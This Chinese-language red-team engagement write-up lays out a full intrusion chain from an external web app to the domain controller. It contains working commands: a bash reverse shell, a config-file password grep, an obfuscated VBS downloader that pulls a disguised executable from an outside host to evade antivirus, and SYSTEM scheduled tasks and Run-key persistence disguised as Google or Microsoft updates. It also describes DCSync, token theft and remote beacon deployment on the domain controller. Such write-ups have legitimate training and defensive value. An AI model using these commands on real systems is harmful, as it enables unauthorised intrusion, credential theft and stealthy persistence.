内部红蓝对抗实战技术总结

前言

本文记录了一次内部红蓝对抗的完整渗透过程，展示了从外网到内网再到域控的完整攻击链。攻击过程中利用了多个漏洞和技术手段，包括S2-061、WebLogic远程代码执行、泛微OA远程代码执行等，并展示了权限维持和横向移动的技巧。

第一层攻击：S2-061漏洞利用

信息收集阶段

1. 对目标域名*.xxx.com进行子域名暴力破解，获取test.xxx.com等子域名
2. 对发现的子域名进行批量目录扫描
3. 人工筛选过滤扫描结果，发现有效入口点

漏洞利用

• 发现index.bak文件，提示存在S2-061漏洞
• 直接使用payload进行攻击：
  • 初始阶段防守方未部署WAF，可直接利用
  • 后期防守方启用WAF后，使用以下方法绕过：
    • 使用chunked-coding-converter
    • 发送大POST包

权限获取与维持

1. 反弹shell（对payload进行编码）：

   bash -i >& /dev/tcp/IP/PORT 0>&1
   

   编码工具：http://www.jackson-t.ca/runtime-exec-payloads.html

2. 信息收集：

   find / $ -name '*.conf' -o -name '*.xml' $ -exec grep -ir 'password=' {} \; 2>/dev/null
   

3. 密码复用：

   • 使用收集的密码尝试SSH登录
   • tomcat123456成功登录tomcat用户
   • 通过sudo直接提权获取root权限

4. 跳板搭建（可选择以下工具）：

   • NPS：https://github.com/ehang-io/nps
   • FRP：https://github.com/fatedier/frp

第二层攻击：WebLogic远程代码执行

内网探测

1. 使用第一层跳板对192.1.1.1/24进行全端口扫描
2. 发现有效服务：
   • http://192.168.1.17/#/overview - Apache Fink
   • http://192.168.1.3:8001 - WebLogic

漏洞利用

1. Apache FLink未授权上传jar包远程代码执行漏洞

   • 使用msf生成恶意jar文件
   • 执行反弹shell，发现为vulhub的docker环境

2. CVE-2020-14882/14883漏洞

   • 探测发现存在漏洞
   • 2021-01-20 13:50利用成功

绕过杀软A

1. 发现某杀软A进程
2. 常规下载方法被拦截：
   • certutil下载被拦截
   • bitsadmin下载被拦截
3. 使用VBS下载器绕过：

   echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^","http://xxxxx:9042/svchost.txt",0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile "1.xml",2 > C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\d.vbs
   cscript d.vbs
   

   • 下载后重命名.xml为.exe执行上线

权限维持

1. 计划任务：

   schtasks /create /SC HOURLY /RU "NT Authority\SYSTEM" /TN "GoogleUpdate" /TR "C:\windows\system32\scvhost.exe"
   

2. 注册表启动项：

   reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v MicrosoftUpdate /t REG_SZ /d "C:\windows\system32\scvhost.exe"
   

内网信息收集

1. 获取密码
2. 查看网段和工作组信息
3. 建立第二层跳板

第三层攻击：泛微OA远程代码执行

目标发现

1. 使用第二层WebLogic跳板作为代理
2. 扫描发现泛微OA系统：

   http://10.1.1.3/login/Login.jsp?logintype=1
   

漏洞利用

1. 泛微OA E-cology远程代码执行漏洞：

   http://10.1.1.3/weaver/bsh.servlet.BshServlet
   

   • 可执行任意命令
   • 获取system权限
   • 发现为defend域内主机
   • 发现某杀软B

绕过杀软B

1. 将powershell可执行程序复制到其他目录并重命名
2. 成功绕过杀软B上线Cobalt Strike

权限维持

1. 计划任务：

   schtasks /create /SC DAILY /RU "NT Authority\SYSTEM" /TN "GoogleUpdateCheck" /TR "cmd /c start /b C:\windows\system32\scvhost.exe" /F
   

2. 注册表启动项：

   reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdateCheck /t REG_SZ /d "C:\windows\system32\GoogleUpdate.bat"
   

域内横向移动

1. 信息收集：

   • 发现有域管理员运行的进程
   • 进行凭证窃取
   • 执行DCSync攻击

2. 获取域管理员权限：

   • 窃取令牌后获得域管理员权限
   • 成功访问域控

3. 控制域控：

   • 将免杀CS beacon复制到域控
   • 创建计划任务远程执行：

     schtasks /create /S dc-01 /SC DAILY /RU "NT Authority\SYSTEM" /TN "MicrosoftUpdate" /TR "c:\windows\system32\WinDefender.exe" /F
     schtasks /Run /S dc-01 /TN "MicrosoftUpdate"
     

   • 成功获取域控权限

总结

本次红蓝对抗展示了完整的攻击链：

1. 从外网Web应用漏洞入手
2. 逐步深入内网
3. 通过漏洞利用和权限提升获取关键系统控制权
4. 最终获取域控权限

关键点：

• 防守方用域管账户登录OA主机，加速了攻击进程
• 多层跳板搭建确保访问通道
• 多种权限维持技术确保持久化
• 针对不同杀软的绕过技术

防御建议：

1. 加强密码策略，避免密码复用
2. 及时修补已知漏洞
3. 限制域管账户使用范围
4. 部署完善的终端防护和网络监控